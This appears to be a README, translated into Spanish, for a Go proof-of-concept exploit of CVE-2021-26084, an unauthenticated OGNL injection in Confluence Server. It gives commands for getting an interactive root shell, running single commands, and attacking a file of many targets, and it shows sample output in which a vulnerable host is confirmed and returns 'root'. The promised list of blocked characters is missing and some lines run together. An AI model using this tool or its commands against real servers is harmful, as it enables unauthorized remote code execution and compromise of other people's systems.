
CVE-2021-26084 - Inyección OGNL en Confluence Server Webwork (Pre-Auth RCE)
Prueba de concepto para CVE-2021-26084.
Inyección OGNL en Webwork de Confluence Server (RCE sin autenticación)
Esto es solo con fines educativos. No soy responsable de tus acciones. Úsalo bajo tu propio criterio.
Debido al payload, no es posible pasar algunos caracteres. La siguiente lista es lo que he encontrado durante mis pruebas.
"| go run exploit.go -t <target> -i
Ejemplo
root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye
exit para salir del shell interactivogo run exploit.go -t <target> -c <command>
go run exploit.go -f <file> -c <command>
go mod download
go build exploit.go